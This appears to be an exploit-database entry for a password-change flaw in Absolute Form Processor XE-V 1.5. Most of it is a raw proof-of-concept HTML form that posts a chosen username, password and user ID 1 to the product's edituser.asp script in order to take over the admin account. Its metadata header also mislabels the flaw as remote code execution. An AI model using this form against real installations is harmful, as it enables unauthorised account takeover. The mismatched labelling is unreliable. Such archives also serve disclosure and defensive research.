Absolute Form Processor XE-V 1.5 Remote Change Pasword

vendor:

Absolute Form Processor XE-V

by:

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: Absolute Form Processor XE-V

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Absolute Form Processor XE-V 1.5 Remote Change Pasword

The Absolute Form Processor XE-V 1.5 allows remote attackers to change the password of a user account by sending a specially crafted request to the edituser.asp script.

Mitigation:

Update to a patched version of Absolute Form Processor XE-V.

Source

Exploit-DB raw data:

<title> Absolute Form Processor XE-V 1.5 Remote Change Pasword  </title>
<body bgcolor="#FFFFFF" text="#000000">
<form name="form1" method="post" action="http://www.xigla.com/absolutefp/demo/edituser.asp">
  <table width="96%" border="0" cellspacing="2" cellpadding="2" align="center">
    <tr>
      <td>Home:http://www.xigla.com</td>

    
          <input type="hidden" name="userid" value="1">
          
        </div></td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#666666"></td>
    </tr>

    
    <tr valign="top" align="left">
      <td width="27%" bgcolor="#CCCCCC"><b><font size="2" face="Arial, Helvetica, sans-serif">E-mail
        :</font></b></td>
      <td width="71%" bgcolor="#F3F3F3"><b><font size="2" face="Arial, Helvetica, sans-serif">
        <input type="text" name="email" size="40" value="email@here.com" maxlength="250" >

        </font></b></td>
    </tr>
    <tr valign="top" align="left">
      <td width="27%" bgcolor="#CCCCCC"><b><font size="2" face="Arial, Helvetica, sans-serif">Username
        :</font></b></td>
      <td width="71%" bgcolor="#F3F3F3"><b><font size="2" face="Arial, Helvetica, sans-serif">
        <input type="text" name="usr" size="40" value="admin" maxlength="250">
        </font></b></td>
    </tr>
    
    <tr valign="top" align="left">
      <td width="27%" bgcolor="#CCCCCC" height="27"><b><font size="2" face="Arial, Helvetica, sans-serif">Password
        :</font></b></td>

      <td width="71%" bgcolor="#F3F3F3" height="27"><b><font size="2" face="Arial, Helvetica, sans-serif">
        <input type="password" name="pwd" size="40" value="admin" maxlength="250">
        </font></b></td>
    </tr>
    
    </form>
<p><b><font face="Arial, Helvetica, sans-serif" size="2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Cod[3]d By ThE g0bL!N</font></b></p>
    <tr>
      <td width="28%" bgcolor="#CCCCCC">&nbsp; </td>
      <td width="72%" bgcolor="#F3F3F3"> <input type="submit" name="button" value="Save User">
      </td>
    </tr>

# milw0rm.com [2009-04-24]